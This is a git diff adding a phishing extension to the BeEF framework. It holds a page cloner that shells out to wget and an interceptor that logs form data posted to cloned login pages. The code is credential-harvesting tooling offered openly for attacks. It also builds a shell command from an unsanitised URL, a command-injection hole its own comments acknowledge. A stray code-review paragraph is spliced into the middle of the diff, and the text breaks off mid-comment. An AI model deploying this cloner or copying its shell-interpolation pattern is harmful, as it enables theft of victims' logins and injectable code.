diff --git a/.gitignore b/.gitignore
index c02e0a406..9ebc010fe 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
 beef.db
 test/msf-test
-custom-config.yaml
\ No newline at end of file
+custom-config.yaml
+extensions/social_engineering/web_cloner/cloned_pages
\ No newline at end of file
diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
new file mode 100644
index 000000000..d3b279ba6
--- /dev/null
+++ b/extensions/social_engineering/config.yaml
@@ -0,0 +1,24 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ extension:
+ social_engineering:
+ enable: true
+ name: 'Social Engineering'
+ authors: ["antisnatchor"]
+ web_cloner:
+ add_beef_hook: true
+ user_agent: "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2"
diff --git a/extensions/social_engineering/extension.rb b/extensions/social_engineering/extension.rb
new file mode 100644
index 000000000..95edcfe2d
--- /dev/null
+++ b/extensions/social_engineering/extension.rb
@@ -0,0 +1,31 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+module Extension
+module SocialEngineering
+ extend BeEF::API::Extension
+
+ @short_name = 'social_engineering'
+ @full_name = 'Social Engineering'
+ @description = 'Phishing attacks for your pleasure: web page cloner (POST interceptor and BeEF goodness), highly configurable mass mailer, etc.'
+end
+end
+end
+
+require 'extensions/social_engineering/web_cloner/web_cloner'
+require 'extensions/social_engineering/web_cloner/interceptor'
+
+
diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
new file mode 100644
index 000000000..7eba2ad46
--- /dev/null
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -0,0 +1,56 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+ module Extension
+ module SocialEngineering
+
+ class Interceptor < Sinatra::Base
+
+ def initialize(file_path)
+ super
+ @config = BeEF::Core::Configuration.instance
+ @cloned_page = ""
+ File.open(file_path,'r').each do |line|
+ @cloned_page += line
+ end
+ end
+
+ # intercept GET
+ get "/" do
+ print_info "GET request"
+ @cloned_page
+ end
+
+ # intercept POST
+ # the 'action' attribute of the 'form' element is modified to the URI /
+ # in this way the request can be intercepted
+ post "/" do
+ print_info "POST request"
+ request.body.rewind
+ data = request.body.read
+ print_info "Intercepted data:"
+ print_info data
+
+ #todo: do a GET request on the target website, retrieve the respone headers and check if X-Frame-Options is present
+ #todo: or framebusting is present. If is not present, open the original URL in an iFrame, otherwise redirect the user
+ #todo: to the original page
+ end
+
+ end
+ end
+ end
+end
+
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
new file mode 100644
index 000000000..f962b4e90
--- /dev/null
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
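Review bot: In Interceptor#initialize the bare `super` forwards `file_path` to `Sinatra::Base#initialize`, whose first positional parameter is the downstream Rack app rather than a path, so the cloned-page file ends up registered as the wrapped app; `super()` appears to be what is intended, to be confirmed against the Sinatra version the project pins. The same method also opens the file with `File.open(file_path,'r').each` and never closes it, and builds the body with `+=` per line; `@cloned_page = File.read(file_path)` does both jobs and releases the handle. The `post "/"` route ends on `print_info data`, so the response body and status are whatever that logger returns rather than an explicit value — the three `#todo` lines describe the intended follow-up, but until then the route should at least return an explicit body so the behaviour is defined.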
@@ -0,0 +1,115 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+ module Extension
+ module SocialEngineering
+ class WebCloner
+ include Singleton
+
+
+ def initialize
+ @http_server = BeEF::Core::Server.instance
+ @config = BeEF::Core::Configuration.instance
+ @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
+ end
+
+ def clone_page(url)
+ #todo see web_cloner.rb, work perfectly
+ # output.html and output2.html (the one with the form action modified to /)
+ # must be stored in cloned_pages
+ print_info "Cloning page at URL #{url}"
+ uri = URI(url)
+
+ #output = url.split("/").last #todo test if http://google.com/ produces an error
+ output = uri.host
+ output_mod = "#{output}_mod"
+
+ user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
+
+ #todo: prevent Command Injection
+ wget = "wget '#{url}' -O #{@cloned_pages_dir + output} --no-check-certificate -c -k -U '#{user_agent}'"
+ IO.popen(wget.to_s) { |f| @result = f.gets }
+ print_debug @result
+ #todo, also check if the URL is valid with:
+ #unless (url =~ URI::regexp).nil?
+ # # Correct URL
+ #end
+
+ #todo: this should be the good way to prevent command injection, because the shell is not open. 
+ #todo: there are issues: Scheme missing when calling wget
+ #wget_path = "wget"
+ #env = {}
+ #args = %W['#{url}' -O #{output} --no-check-certificate -c -k -U #{user_agent}]
+ #IO.popen([env, wget_path, *args], 'r+') { |f| @result = f.gets }
+
+
+ #if !File.writable?(File.basename(@cloned_pages_dir + output_mod))
+ # print_info "Cannot write to file..."
+ # IO.popen("chmod 777 #{@cloned_pages_dir}") { |f| @result = f.gets }
+ # sleep 2
+ #end
+
+ File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
+ File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
+ # Modify the